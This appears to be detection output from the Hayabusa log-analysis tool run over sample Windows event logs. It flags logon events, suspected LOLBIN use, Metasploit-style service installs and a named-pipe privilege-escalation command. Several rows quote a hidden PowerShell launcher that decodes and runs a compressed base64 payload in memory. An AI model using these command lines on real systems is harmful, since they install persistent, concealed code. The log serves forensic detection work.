+09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | 
Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: 
C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 
+09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: 
%SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: mHPhVsrnnbYuDOWj | Path: 
%SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | 
Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | 
